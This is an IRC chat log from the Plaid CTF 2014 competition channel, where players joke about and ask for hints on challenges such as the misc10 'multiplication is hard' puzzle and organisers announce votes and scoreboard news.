s3Rious> Ymgve: I've done it. Now I have a headache....
<tokki> hudak is giving me cancer
kanghee> I'm starting to hate white cats
<sorin_> i also have issues there kanghee
tokki> lol
fal7Q> :)
<player10> executable
x7r0n> any ops for for100 ? or what is the pattern for it ?
<corpille> so stega much cool
tylerni7> x7r0n: I mean
<+tylerni7> it's stego
<+tylerni7> find hidden flage
<+tylerni7> very hidden
<+x7r0n> i got it
<tylerni7> much flage
<+player10> much secret?
<tylerni7> so stego
<+x7r0n> can i pm u
tylerni7> x7r0n: sue
<+x7r0n> i mean i feel its the correct..can i ?
<x7r0n> ok :-)
<tylerni7> Gynvael: it's getting fixed..
<+Gynvael> ack
<tylerni7> sorry
Gynvael> no worries, just making sure it's not an IP backdoor, but a TCP one
<Gynvael> ;D
<Guest76035> So for tiffany, if I am running outside a debugger, should I be seeing ptrace errors?
<== Mawat [~Mawat@97e4e410.skybroadband.com] has joined #pctf
tylerni7> Gynvael: xP
tylerni7> backdoor? whatever could you mean :O
== Stean [~Stean@95-89-213-155-dynip.superkabel.de] has joined #pctf
jduck> Gynvael: did you try dirbuster?
<Gynvael> tylerni7: nevermind, I mixed up the tasks
Gynvael> jduck: hey man
<jduck> ;D
<tylerni7> ;)
<+tylerni7> hey jduck
<+Gynvael> jduck: yeah! it couldn't connect on 1 server, to I started it on amazon 100 machines
<tylerni7> lol
<+Gynvael> jduck: just to be sure I get my fair share of cpu
<== netsurf3 [~netsurf3@cpc10-stav16-2-0-cust832.aztw.cable.virginm.net] has joined #pctf
tylerni7> when we give source, it really makes me sad when people use dirbuster
<+jduck> LOL
<== olkis [4e087709@gateway/web/freenode/ip.] has joined #pctf
Gynvael> hahahaha
<Gynvael> lolz
<robbje> people will always use dirbuster :>
<tylerni7> we should really set up some IDS or something that auto detects dirbuster
<+robbje> dirbusters gonna dirbust!
<jduck> they were hoping for http://challenge.server/key.txt
<mongo12> ban all dirbusters!
<mongo12> and then hang them
<mongo12> \o/
<tylerni7> yeah, we block IPs when stuff DoS's
<+foundation> tylerni7: it could be a research paper, IDS that detect only lame attacks and lets in sophisticated ones!
<Gynvael> tylerni7: reply with fake flags on common dirbuster queries
<Gynvael> haha
<tylerni7> foundation: haha
<+mongo12> haha
<== InternalCumBustI [43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.] has joined #pctf
jduck> Gynvael: nooooo, they they will try to submit them all!
<mongo12> in most cases, you could probably do, more than X reqs in Y secs, iptables drop for 5min
<mongo12> should stop it pretty fast
<Pitr_> Time to introduce fake flags with penalty-points
<jduck> :)
foundation> you know what i'm gonna do for the next time, i'll make a fake stegano tool and put it on SF and github , and pwn people that use random tools to try to solve stupid stegano challenges
<wa1ker> !misc
<== Adran [adran@botters/staff/adran] has joined #pctf
foundation> who opens a stegano challenge , anyway?
<== Cailou [~Cailou@] has joined #pctf
== knc [310f825d@gateway/web/freenode/ip.] has joined #pctf
Gynvael> jduck: that's the idea!
<Gynvael> jduck: and each flag, -10 points!
<Gynvael> ;D
<Gynvael> flags of shame or sth
<tylerni7> Gynvael: xD
<+tylerni7> we've discussed things like this >.<
<+Gynvael> hah ;)
<Gynvael> awesome
InternalCumBustI> im so confused on doge_stego I know where the message is but i have no clue how to get it
<== fal7Q [~root@pc121.riednet.wh.tu-darmstadt.de] has left #pctf []
player10> copy paste
InternalCumBustI> copy paste what?
<ShortKidd> ohhey heartbleed worked the first time.
<player10> copy paste the flag
<pctf_scoreboard> gcc server is up. thank you for you patience and flying PPPair.
<+tylerni7> heh
<+Gynvael> thanks
<mouth`> argh whatscat! we've exploited you why you no give flag??
<ShortKidd> HAve you asked nicely?
<tylerni7> mouth`: you can pm me perhaps
<+tylerni7> you probably didn't exploit it hard enough
tylerni7> :)
<+player10> did you try turning your exploit off and on again?
<ShortKidd> Try asking nicely. I know I wouldn't do something for you if you exploited me.
<halfvollemelk> any tips for rendezvous challenge?
<halfvollemelk> i'm stuck
<== ir|na [~i@swarm.cs.pub.ro] has quit [Quit: leaving]
n00bz> who i can pm about web300?
mouth`> tried asking the t-rex nicely yeah
<Adran> trex cat must be repaired :>
iZsh> the number of PM is increasing it seems
<tylerni7> ?
<+Mawat> The Chandler relay servers, is there just 1?
<tylerni7> Mawat: there are multiple
<+Mawat> So I can use any?
<tylerni7> houqp: is the authority though (it's his problem)
<+houqp> yes
<+houqp> any of them will work
== pctf533 [46b9d762@gateway/web/freenode/ip.] has joined #pctf
asmoday> I cannot get shit on this
<houqp> have you tried poop?
<+Anyny0> x)
<tokki> lol
asmoday> whatacat failed to email, mtpox got admin.php failed, heartbleed none of my scripts dump anything, paris ollydbg just execptions, pyjail just get registers no flags
<asmoday> time to apply at mcdonalds or walmart
<pctf533> lol
Brooklynt_Overfl> Everyone needs a plan B. There is always stripping.
<nullProtectorate> lol
<x_x> Just solved my first stego challenge. Walmart avoided. Faith in self, restored.
<x_x> >_>
<x_x> <_<
<asmoday> I have a not so large member, so perhaps nursing home stripping
<tylerni7> lol
<+gbarboza> Awk
<+tylerni7 almost spat water on his screen
* asmoday> like bad grandpa deal
asmoday> anybody want to get addicted to drugs instead of these crazy challenges
<== TMT [~taktaz_m2@] has quit [Ping timeout: 240 seconds]
<+== ari_ [~ari_@dy869-1-82-228-24-60.fbx.proxad.net] has joined #pctf
== bobsteam [1817f0b6@gateway/web/freenode/ip.] has joined #pctf
asmoday> this is too stressful for multitasking
x7r0n> 2012 pwnies
<x7r0n> guess u shld have made 2014
<x7r0n> :-p
<anyny0> Probably
<tylerni7> a13k: almost certainly
<+houqp> a13k: you know the solution?
<+anyny0> Not being able to connect is part of it
<a13k> tylerni7: thanks.
<a13k> houqp: maybe
<houqp> ok pm me please :)
<a13k> will pm if they don't work
<anyny0> Any hints for WhatsCat? I really have no clue on where might the exploit be
cybertech> so i am trying to find out the twenty cypto
<cybertech> i found the key
<cybertech> but its not the flag
<cybertech> but than i found a poem
<anyny0> The flag might be in the poem
<tylerni7> maybe specifically towards the end
<+a13k> houqp: issue is on my end
<mserrano> lol
halfvollemelk> tips for rendezvous? i could rly use one
<houqp> nice :)
<+a13k> houqp: never hurts to ask though :-p I've ran/cometed in enough ctf's to know to ask if things are working as expected before beating my head against the desk
<mserrano> Good job hellman! there goes wheee
<+houqp> a13k: yeah, rendezvous behaviours like it's down most of the time, which is sad :(
<+tylerni7> nice mslc :)
<+houqp> halfvollemelk: scroll back
<+Cimmi> cybertech: look at the end
<hellman> open more crypto, i can't look at rsa :/
<tylerni7> hahah
<+mserrano> hellman: lol why not
<+tylerni7> why not xD
<+a13k> houqp: I kinda figured that. seemed obvious from the initial text from the challange. the issue I had was some configs
<anyny0> Could someone give me a tiny lead on whatsCat?
<cybertech> cimmi i am
<cybertech> i dont get it
== reanimus [~animus@96-32-143-144.dhcp.gwnt.ga.charter.com] has joined #pctf
mserrano> voting is open
<+mserrano> I would recommend voting for chance
<+mserrano> you've gotta get something this time :P
<+== ebeip90 [~user@] has joined #pctf
tylerni7> that's how randomness works, sure
<+tylerni7> -_-
<+mserrano> yup
<+mserrano> it is
<+x_x> Yeah, twenty is giving me a headache, too. Found the flag, but it doesn't accept.
<tylerni7> x_x: pm me/
<+mserrano> x_x: pm me what you think the flag is
<+mserrano> or tylerni7
<+asmoday> all in all am learning a bit, I really hate the plague though, now that move is ruined
<tylerni7> heh
<+Cimmi> The flag should be readable as a sentence
<arthurdent> asmoday: hold your tongue sir
<arthurdent> that movie is a classic
<corewar> it can never be ruined
<asmoday> classic pain the arse
<asmoday> that gcc though
<pctf_scoreboard> that movie is the best
<+asmoday> plague could go back and become Dades dad
arthurdent> wat
<asmoday> then move through time and impregnate kate then really screw things up for Zero Cool
<tylerni7> lol
<+asmoday> after that Penn aka Hal can do some magic with Teller who was in the movie as Gibson Mainframe
<asmoday> oh Phiber if you only knew
<== badeec [~badeec@2a02:810d:640:7bc:6a5d:43ff:fe80:ce1a] has quit [Quit: Leaving]
arthurdent> now that you mention it, gibson mainframe never spoke
<== ghostpixel [~quaid@hsv.pikewerks.com] has joined #pctf
asmoday> right haha
<asmoday> and Penn is never far from Teller
<asmoday> its like his liver, little and full of stress
asmoday> I am surprised finding flight 370 wasnt a flag on this....
<asmoday> too soon, too soon....
<== Mawat [~Mawat@97e4e410.skybroadband.com] has joined #pctf
n00b13> what is the input key length for web 150
<cai_> heh we have over 1000 registered teams now :p (780 of them have at least 1 point)
<+== chunderstruck1 [~daniel@184-98-244-58.phnx.qwest.net] has quit [Quit: Leaving.]
tylerni7> ooo dragon sector close to 2nd place
<+cai_> voting ends in 5 minutes
mserrano> oh man DS
<+mserrano> goin' hard
<+cai_> now in 2nd
<+cai_> nice
<+mserrano> now you just have to catch 0xffa ;)
tokki> OH SHIT
tylerni7> zomg, teh chronospherez
<+tylerni7> but yeah voting time :)
<+tokki> wait im still confused tho, if you vote 1, does it skip the opened challs?
<tylerni7> yes
<+n00b13> any hints for web150?
<mserrano> uh
<+cai_> you mean 3
<+mserrano> you mean vote 3
tokki> k
<tokki> 3
tokki> i thought skipping as like skipping the tiles for opened challs
<mserrano> you are currently at gcc
<+tokki> nvm
<mserrano> lol
<+tokki> lol
<cai_> voting ends soon
tokki> *gasp* *gaspgasp*
<n00b13> is it just me or should web150 be worth more
<cai_> damn
<+cai_> no luck on chance card
<+cai_> new voting starts
<+cai_> you have 5 mins :)
== Cailou [~Cailou@] has quit [Ping timeout: 245 seconds]
tokki> wait no i dont think i get the chronosphere thing but i guess its okay
<corpille> crap no luck for today
<tokki> ikr
<houqp> 15:50:31 +tylerni7 | that's how randomness works, sure
<+asmoday> I am playing pokemon
<rev1550> is anyone else having problems download doge_stege
<tokki> go pikachu!!!!!!!!!
tokki throws hamster
* cai_> tokki: what don't you get it?
<+tokki> k so you guys said that the voting skips opened challs
<cai_> the hatched tile is where the current position is
<+cai_> yes it does
<+tokki> so if you vote like 1 right now,
<cai_> it will open pwnables 150
<+tokki> where do you go
<cai_> at the end of the present board
<+tokki> OH I GET IT
<cai_> :)
<+tokki> OH
<mserrano> 1 -> pwnable 150; 2 -> reversing 250; 3 -> pwnable 200; 4 -> forensics 350; 5 -> crypto 250; 6 -> misc 10
<+tokki> sry for my idioticness
<mserrano> pls misc 10
<+mserrano> or
<+mserrano> forensics 350
<+tokki> pls misc 10
<mserrano> or
<+tokki> pls
<corpille> misc 10
<mserrano> pwnable 150
<+tokki> pls
<cai_> lol
<+anyny0> Mis 10 :D
<tokki> pls misc
<tokki> ily guys
mserrano> no
<+cai_> what about 2-part forensics 350?
<+tokki> pls
<mserrano> pls pwnable 150
<+mserrano> or 2-part forensics
<+tokki> pls misc 10
<Hertz_> pls nothing
<tokki> pls
<tokki> lol
<mserrano> Hertz_: lo
<+mserrano> l
<+tokki> i aint got time fo dat
<asmoday> is the point to just do pokemon forever
<tokki> pokemon!
asmoday> its stuck on chaning art i think
asmoday> changing
<asmoday> ha i think i broke it
<cai_> misc10 is opened
<+cai_> lol
<+cai_> you guys win
mserrano> lol
<+tokki> ILYyYYYYY
<tokki> ♥︎
<mserrano> lol
<+cai_> time to watch people submitting wrong number
<+cai_> lol
<+mserrano> everyone is guessing the wrong thing
<+tokki> lol
<mserrano> like literally everyone
<+tokki> lol
<subsnake> will there be any hints soon?
<tokki> lemme join ;)
<mserrano> YEAH BS LABS
<+cai_> grats BS Labs
<+mserrano> FIRST BLOOD
<tokki> 300G
<cai_> voting is up again lol
<+mserrano> yay MSLC
<+mserrano> and H4x0rPsch0rr
<+mserrano> there goes the breakthrough
<+anyny0> Hmm
<cai_> except there is no bonus point
<+cai_> lol
<+anyny0> x)
tokki> shet
<mserrano> yay dcua
<+mserrano> 4 solves
<+tokki> i cant believe im stuck in misc 10
<mserrano> misc 10 is a quality problem
<+== vooX [4e81ae54@gateway/web/freenode/ip.] has joined #pctf
tokki> hmm..
corpille> 38.55 * 1700 mmhh ...
<asmoday> yeah not what you think
<cai_> it's hard
<+tylerni7> yeah man
<+cai_> not everyone can do that correctly
<+tylerni7> multiplication is hard
<+tokki> D:
<tokki> D::
<tokki> D:::::
<tokki> how did people solve dis
<vooX> damn, web300 is more easier than web200..
<subsnake pings tylerni7 pm
* tokki hurls trout
* bobsteam> is it vooX ?
<vooX> yup, at least the kpop one
<vooX> which i'm still fighting with
<mserrano> bubble bubble pop pop
<+bobsteam> ah, I haven't started kpop yet
<tokki> kpop is the best
<bobsteam> I'm too busy hating memes and cats
<cai_> man we are gonna hit 10K submissions soon >:-)
<+tylerni7> lol
<+rray> web300 is frustrating ;_;
<== player10 [~root@vps-8685-0281.cloud.tilaa.com] has quit [Ping timeout: 276 seconds]
tokki> lol
<vooX> not as furstrating as songs-web
<tylerni7> forensics 250 is cool :)
<+cai_> forensics opened
<+== knc [6a4cc70d@gateway/web/freenode/ip.] has quit []
tylerni7> good challenge to open up :)
<== paraxor [~aoepxnpe@unaffiliated/prazial] has left #pctf []
== frozencemetery [~frozencem@pool-71-174-94-227.bstnma.fios.verizon.net] has quit [Ping timeout: 250 seconds]
marcan> man, paris took way too long.
dracu> i don't get the flag for misc10 - i mean i got it, but i don't get it, u know ? :D
<obriencd> i didnt get it so i really dont get it
<cai_> if you got the flag, it would have accepted and gave you points!
<+anyny0> The number's important but have so many flag possibilites D=
dracu> i actually got the flag
<dracu> and the points :)
<== mouth`1 [~mouth@] has joined #pctf
cai_> ah
<+dracu> but why was that the flag ?
cai_> the process of getting that flag should've let you know?
<+dracu> yes
cai_> then you understand why it is what it is :p
<+dracu> yeah... i was just amazed that it said "success"... (wtf?!)
cai_> :)
<+dracu> fun, but hard ctf 4 n00bs
cai_> yay over 10K submission \o/
<+houqp> \o/
tokki> lol
<== hammerpig [~user@gateway/tor-sasl/hammerpig] has joined #pctf
vooX> damn, the last stage of thes web-songs makes me crazy... :(
NK_> tylerni7: i feel like there is a disturbance in the force
<NK_> the gameboard say our last submission was a day ago
<cai_> NK_: refresh?
<+NK_> same
<cai_> hmm
cai_> cache flush refresh?
<+NK_> the scoreboard say 15 min though
<== mad0na [~subsnake@] has joined #pctf
cai_> yeah, don't worry about it.. it's just there more for the styles/quick info, but things are correct in db
<+NK_> hm cache flush refresh say the same
cai_> weird :/
<+NK_> yep
<NK_> let's see on another browser just in case
<vooX> btw, this year, web is pretty hard
<NK_> same with another browser
<tylerni7> vooX: I think normally we don't have much web
<+tylerni7> people asked for more web and forensics
NK_> yes it's good
<cai_> NK_: strange. it
<+cai_> it's probably cache on our side then
<+tylerni7> we gave them web and forenics that we thought were fun :)
<+cai_> but yeah, i wouldn't worry about it
<+NK_> too much exploit / reverse in the past years
<cai_> thanks for letting us know tho
<+tylerni7> NK_: :/
<+tylerni7> we have more of those challenges too, they just aren't opened yet :P
<+NK_> tylerni7: i know not everyone aggree with this :p
<mrsmith67> can anyone help me with multipliation?
<mrsmith67> i know it has to do with time...
<tylerni7> mrsmith67: multiplication is hard
<+tylerni7> you should have a computer do it
<+NK_> addition, multiplication and division is hard
<NK_> according to the past years
<cai_> math is hard
pouete> as a question : on __nightmares__ have really nothing to do with pyjail ?
<cai_> NK_: you can guess what will be on next year :)
<+== psaikonet1 [~psaikonet@cpe-72-179-33-155.austin.res.rr.com] has joined #pctf
== Apple_Eater [~Apple_Eat@mail.appleeater.com] has joined #pctf
<pouete> ( just tried to call ().__nighmares__ . was not disapointed O )
<tokki> :O
<== n00bz [~1234@host31-111-dynamic.6-79-r.retail.telecomitalia.it] has joined #pctf
tokki> me no getz misc 10
<tokki> this is sad
<Pitr_> I get it but only after someone explained it to me 8)
tokki> hmm
<asmoday> ok seriously for curl, is this a DEP or Reverse
<tylerni7> what do you mean DEP?
<+asmoday> sorry dpe, deep packet inspect
<dct1> johnny DEP
<tokki> LOL
<americhigo> that would be dpi
asmoday> said the guy who has slept ;p ha
<== Frisk0 [~Frisk0@] has quit [Ping timeout: 240 seconds]
asmoday> is it in the tcpdump or the memory
<Apple_Eater> I had a question with kpop -- just wanted to see if I am on the right track. Anyone around?
<Pitr_> it's DERP
<tylerni7> Apple_Eater: you can pm me
<+tokki> *gasp*
<Apple_Eater> Thanks
<tokki> DERP!!!
<ShortKidd> tyler, are you ever not here?
<tokki> is misc 10 like a nonsense question
<asmoday> this damn game had me questioning 65535 how dare you
<WhizzMan> urgh, multiplication *is* hard
<tokki> like the answer should be like unicorns or something
<== killobyte [~killobyte@h140.net36.bmstu.ru] has joined #pctf
killobyte> hi, who can i ask about whatscat task?
<tylerni7> killobyte: me
<+tylerni7> pm
<+ShortKidd> the heartbleed one, tokki?
<tokki> the multiplication one :p
<ShortKidd> oh lol
== Frisk0 [~Frisk0@2601:7:9e00:8f:ed6f:4299:1327:d3fe] has joined #pctf
tokki> *gasp* cai is op!
<== cai_ changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $10 added to each cash prizes so far (from CHANCE card)
cybertech> the mutiplication one is not working
<tokki> lol
<cybertech> i found the answer is wont take it
tokki> lol
<subsnake> xD
<Pitr_> cybertech, try querying an admin
<tokki> xD
<cybertech> hmm
<cybertech> no admins on here
<asmoday> cybertech its not 65535
<shadghost> admins are 'voiced' here
<cybertech> hmm
<tokki> lol
<subsnake> nor unicorn
<cybertech> i thought that was the answer
<tokki> damn!
<cai_> cybertech: it will take it when you have the correct answer
<+asmoday> think outside that box
<cybertech> ok
<Yerer> Oh haha
<Yerer> I'm surprised that was the answer for misc10
<cai_> :)
<== kiwhacks [~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128] has joined #pctf
asmoday> You will punch yourself after knowing the answer
<WhizzMan> oh I'm sure I will
<asmoday> like really hard
<NK_> :)
<tokki> D:
<asmoday> I will kick a baby, luckily none are near me ever, after I get the answer to a few of these
<asmoday> Dramatic over thinking happens at defcon every year
<tokki> D:
<WhizzMan> puppies and kittens will be good supplicants
<pouete> I would like to know if i am on the right track, should i ask my question on the public chan ?
tylerni7> pouete: pm me
<+tylerni7> may not be able to answer
<+tylerni7> but yeah
WhizzMan> Yersinia
<tokki depresses over the scoreboard
* Gynvael> agreed
<ShortKidd> let's be depressed together
<Gynvael> eb huh
<tylerni7> Gynvael: you guys got time :)
<+tylerni7> btw which of you solved rsa?
<+Gynvael> adam_i
<cai_> Nice
<+tylerni7> ooo curlcore solve
<+tylerni7> nice
<+cai_> 0xffa
<+cai_> the vote begins :)
<+tokki> *gasp*
<poppopret> anyone wanna push me in the right direction for web150? =/
<== poppopret [~poppopret@] has quit [Remote host closed the connection]
Gynvael> yeah
<== plaintext [~dada@bl4-157-214.dsl.telepac.pt] has quit [Ping timeout: 252 seconds]
== poppopret [~poppopret@] has joined #pctf
Gynvael> protip for web150: staying on IRC after asking question ftw
<tokki> MUST VOTEZ 1
<tylerni7> heh
<+shadghost> lol
<asmoday> FUCK wanted the be the first curlcore
<poppopret> lol it crashed
<poppopret> back
<tokki> that's sad
<tylerni7> poppopret: pm me I guess
<+iZsh> i got curlcore \o/ :)
<tokki> poppopret: our team member has a similar nickname, haha
<tokki> congrats xD
<bool_101> grats
kiwhacks> what is the format of misc10 multiplication response ?
cai_> kiwhacks: number
<+cai_> int
<+Zoro> ZOMBIE
<tylerni7> \d+
<+kiwhacks> ok thanks
<subsnake> NUMBER?
<subsnake> !
<tylerni7> ?
<+cai_> i mean, you are multipyling two numbers, what did you expect :p
<+[ToH]bp> 42
<subsnake> unicorn works just fine
<Zoro> that's not how it works
<tokki> guys if there are like no hints till the end of the ctf, wat happens :O
<Adran> not invalid flag? :P
<WhizzMan> "unknown flag"
<Adran> the same thing happens whether there are hints or no hints, the winner(s) win :>
<tokki> this misc should at least be 100 points
<tylerni7> well, keep in mind that multiplication is hard
<WhizzMan> What, no recount?
<Adran> and everyone learns something.
<iZsh> tokki: problem with hints is that it kills the scoreboard :)
<tylerni7> WhizzMan: multiplication is hard, man
<+tokki> :D
<WhizzMan> yeah, it is
<tokki> tylerni7: it is this prob is killing our team
<== funtimes [~user@c-68-49-76-217.hsd1.md.comcast.net] has quit [Ping timeout: 246 seconds]
tylerni7> maybe you should do another problem then :)
<+WhizzMan> tokki: pics!
<Yerer> tokki: Try multiplying them
tokki> lol
tokki> hmm
<hellman> open pls more crypto (and other tasks) until morning :)
<Luffy> uh
<== [pwn]tayacan [~tayacan@wireless-conference.science.ku.dk] has quit [Quit: Leaving]
Luffy> is multiplication is hard broken
<tylerni7> Luffy: no
<+NK_> oh
<Luffy> cuz im sure i multiplied them correctly
<cai_> Luffy: it's working fine :)
<+NK_> nooo
<WhizzMan> Luffy: it's hard, that's why
<NK_> this curl is linked to openssl1.0.1e
<Luffy> i feel you guys snickering
<cai_> well, it's hard, so some people couldn't
<+== Stean [~Stean@95-88-74-196-dynip.superkabel.de] has joined #pctf
== haoz [b44ac723@gateway/web/freenode/ip.] has joined #pctf
haoz> a
<== wolfpack [9807491f@gateway/web/freenode/ip.] has joined #pctf
tokki> D:
<ShortKidd> b
<haoz> multiplication is hard ?
< <Zoro> That's what Misc 10 feels like
<tokki> multiplication is hard.
<Adran> error: cannot divide by zero
<whos_tyler> Zoro: I dont get the joke
<Zoro> have you done misc 10 yet?
<whos_tyler> I have
<whos_tyler> still dont get it
<haoz> i dun get the flag :p
<== livinded [~livinded@108-84-156-71.lightspeed.sntcca.sbcglobal.net] has joined #pctf
duckyTS> misc10 is probably something stupid
<== [pwn]Idolf [~idolf@fw-alt2.math.ku.dk] has quit [Ping timeout: 258 seconds]
nullProtectorate> loł
<tokki> lol
<livinded> 101
<asmoday> some middleschooler is laughing
<tokki> i love how people are like, I solved it but i dont get it
<nullProtectorate> łøł
<== vooX [4e81ae54@gateway/web/freenode/ip.] has quit [Quit: Page closed]
haoz> mind to give some hints ? :p
<kmowery> proofs of work :|
<WhizzMan> for a 10 pt challenge? pfff
<haoz> :X
<WhizzMan> I'm not getting it either, but come on, it's a 10 point challenge
<anyny0> Lol
<== mouth` [~mouth@] has joined #pctf
x_x> This 10 point challenge is mocking me.
<WhizzMan> yes :)
<x_x> Much like my Calculus III grade.
<x_x> Y_Y
<WhizzMan> you and plenty of other people
<Luffy> um
<Luffy> is back and time a typo
<Luffy> did you guyes mean back in time
<x_x> Nope, it's a hint.
<Luffy> it is?
x_x> Maybe?
<tylerni7> Luffy: that's a typo
<+tylerni7> :P
<+Luffy> oh
<x_x sniffles.
* x_x> I hoped it was a hint.
<Luffy> youre dumb
<tylerni7> Luffy: which problem?
<+Luffy> go away
<== be [ac17cef9ca@gateway/web/cgi-irc/kiwiirc.com/x-krbszdhddwaqbbzd] has quit [Quit: http://www.kiwiirc.com/ - A hand crafted IRC client]
Luffy> was talking about multiplication is hard
<x_x> Multiplication is hard.
<tylerni7> there, it should say "back in time" now
<+shadghost> 1*1=1 , see i can multiply
<Adran> man its like a chant
<cai_> voting ends in 12
<+tokki> ooh
<namrog84> the flag isn't a number is it
<tokki> they've told me it is an 'int' form
<tokki> but are you guys sure
<cai_> namrog84: it is, for multiplication is hard problem
<+WhizzMan> so no flag{12324} but just 12324 ?
<bwn3r> can anyone help me with 150 ? :'(
<bwn3r> web
tokki goes to corner, checks calculator and cries
* Pitr_> May I complo
<cai_> WhizzMan: yeah, you shouldn't see flag{}.
Pitr_> May I compliment the creator of misc10 :D
<sqall> much time consuming
<sqall> such depression
<sqall> very unwow :/
<kurtisebear> its making me want to kill myself Im sure I need to think out the box a little but its been annoying me for like 30 mins now
<WhizzMan> no amaze
<tokki> ikr
<x_x> It's both funny, and sad.
n00bz> lol voox
<== ggis [~ggis@fw-alt2.math.ku.dk] has quit [Ping timeout: 245 seconds]
LMolr> hints for tenement ??
LMolr> i am trying hard
<LMolr> plz admi
<_ariel> hey guys, i have a problem with reverse 250 (hudak), i have found a key (without patching an app), i get congratz and that's all?
cai_> _ariel: you can pm me the key you found
<+WhizzMan> you want a medal?
<n00bz> any help for web300?
<tokki> a gold medal!
<== wahwah [~wahwah@ctf.inso.tuwien.ac.at] has quit [Ping timeout: 245 seconds]
<mak> To confirm, for reekee you need code execution to be able to find the flag, right?
<== InternalCumBustI [43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.] has quit [Quit: http://www.kiwiirc.com/ - A hand crafted IRC client]
Hertz_> right mak
<== Ph4te [~phate@ctfgate.sec.in.tum.de] has quit [Remote host closed the connection]
Phshap> damn
<cai_> ##### CHANCE Card: $10 added to the pot again
<+cai_> no hints :'(
<+Phshap> :)
<Phshap> i mean :(
<== mode/#pctf [+o cai_] by ChanServ
Phshap> very L(
<x_x> booo money
Phshap> who needs money
<== cai_ changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $20 added to each cash prizes so far (from CHANCE card)
Pitr_> Chance should have a 'valuta change to BTC' card
<[ToH]bp> dogecoin or bust
<WhizzMan> to the moon
<WhizzMan> Pitr_: 'currency change to MTGOX BTC'
<cai_> web is opened
<+bobsteam> question on reekee >.>
<iago-x86> Hey, can I ask somebody a question about whatscat?
<tylerni7> iago-x86: sure
<+tylerni7> I just refreshed the db
<+_blasty_> is new web supposed to give 500 err ?
<tylerni7> _blasty_: ... probably not h/o
<+halfvollemelk> multiplication is hard...
<grimmlin_> crash double free:
<mongo12> five double oh!!
<grimmlin_> arf, wrong window
<Adran> is halphow2js supposed to be giving 500?
<tylerni7> h/o
<+mongo12> call the nine one one
<tokki> am I still online?
<_blasty_> internet pwn-lice
<jduck> q/uit 502 Bad Gateway
<jduck> oops
<tokki> lol
<shadghost> Burp proxy error: Failed to connect to
<mischa__> halphow2js down?
namrog84> 65
<tylerni7> ok
<+acez> who can I ping for kappa
<Im11Plus> Web 200 easy
<Im11Plus> Gives you flag, such wow
<haoz> multiplication is hard...
<namrog84> multiplication is hard...
<anyny0> Indeed
<namrog84> just stick it in calculator, made easy!
<tokki> D:...
<tokki> its hard..
haoz> something wrong with my calculator ? :(
namrog84> probably
<namrog84> do you have CTF mode enabled?
<tokki> lol
<haoz> lolll....
<x_x> The batteries on my TI died. Cannae enter it into CTF mode.
tokki> TI's eat a lot of batteries
<x_x> They really do.
<== Zoro has changed nick to aobugw4uob49tt34
tokki> and they are goddamn expensive, heavy,
<halfvollemelk> I'm sure I multiplied it correctly...
<tokki> and yet my scholl makes us buy them..
<== aobugw4uob49tt34 has changed nick to Zoro
trelgak> can anyone push me in the right direction for reversing200? been working on it for forever..
x_x> I want one of those newer CAS models. They have fancy pants 3D graphing.
<Im11Plus> lul web 200 end.response
<tokki> x_x: rly?! oh god technology
<x_x> Delicious technology
<shortkidd> reverse it, trel
Zoro> http://play.plaidctf.com/files/g++-30f6a74ce24ea3605ba7cbec92222a72.tar.bz2 - nginx 404 Not Found.
<x_x> Refresh a few times.
<x_x> It'll get there eventually.
<WhizzMan> Heh, multiplication is hard is funnier than you'd think, especially if you know why the answer is what it is
<Luffy> ya
<Luffy> its funny :)
<cai_> WhizzMan: :
<+cai_> :)*
<+tylerni7> trelgak: perhaps
<+x_x> This is just getting cruel.
<tylerni7> you can pm
<+x_x> Like every math professor I've ever had.
<x_x> >_>
<haoz> :|
<halfvollemelk> jo, wtf is this sorcery
<halfvollemelk> suddenly I check my scoreboard and multiplication is solved
<Adran> suddenly math is hard
<halfvollemelk> suddenly i'm even more confused
[ToH]bp> Infinity - object > []?
<tokki> D:....
<tokki> i still dont get the multiplication is hard
<tokki> its hard
<LMolr> i dont get crypto 20
<LMolr> :/
<tokki> :/
WhizzMan> halfvollemelk: playing with more people on your team?
<tokki> lol
<haoz> my mathssss....
<LMolr> maybe i am """special"""
<deject3d> crypto 20 is one of the simplest ciphers
<tokki> wat
<tokki> wat?!
<tokki> wat?!?!?
<Lopi> who can I pm with a question regarding a challenge?
<Adran> it was pretty easy
<tylerni7> Lopi: me
<+kiwhacks> misc10 makes me crazy...
<tokki> lol ya
<namrog84> ditto
<Luffy> nah
<Luffy> theyre pretty easy
<Luffy> just gotta think outside the box
<namrog84> im so far outside the box, i dont even know where the box was
<livinded> is reekee getting hammered?
<Adran> I've stretched out the box so much its now a circle
<deject3d> reekee sux
namrog84> 38.55 * 1700
<namrog84> oops
<shadghost> namrog84: copy past is also hard?
<== nofiki1 [~Adium@] has joined #pctf
namrog84> yes, I am clearly an incapable of normal computer operations
<namrog84> can't even construct a sentence correctly either
<tokki> asdfasdfasdfasfdafsadf
<dkohlbre> is kappa supposed to take as much CPU as watching twitch does? Its making my laptop takeoff :/
<== dvddaver [~dvddaver@] has joined #pctf
== shortkidd [60279873@gateway/web/freenode/ip.] has quit [Ping timeout: 240 seconds]
iago-x86> dkohlbre: It shouldn't
<tokki> twitch pokemon!
<namrog84> woo!! Got multiply is hard!
<namrog84> <- idiot
<tokki> did you get key?
<namrog84> yep :D
<tokki> holy shet, i should be working on it harder
<dvddaver> Anybody solved ezhp?
<namrog84> now back to the awful web150
<Ymgve> dvddaver: only 58 teams
<== naam [~naam@] has quit [Read error: Connection reset by peer]
haoz> im the another idiot >.<
<== _ariel [~root@] has joined #pctf
asmoday> dogestege is that one where I have to find the same image online
<haoz> namrog84 : mind to ...... ? :p
<LMolr> tenement owns me
<tokki> 38.55 * 1700 is freaking 65535
<asmoday> hhahaha
<namrog84> :D
<tokki> :D
<tokki> :D....
<namrog84> ...... there it is, i typed it in, but i think the channel blocks flags :D
<Adran> anyone willing to answer a question about a puzzle/hunt?
<namrog84> just like passwords: ********
<tokki> :D
<acez> tylerni7: who can I ping for kappa ?
<Ymgve> tokki: it's not a 1 pointer
<supersat> man... I love paris. mov eax, 0 mov eax, [eax]
<supersat> luuuuulz
<dickoff> acez: me
<+n00bz> web300 is down
<tokki> :D
<|x_x|> tokki: http://paste2.org/IIcALYLX
OMG x_x had the whole irc log and yeah I checked it after posting- thanks so much!!! <3 k me savin in bookmarkz ILY Sorry for not noticing
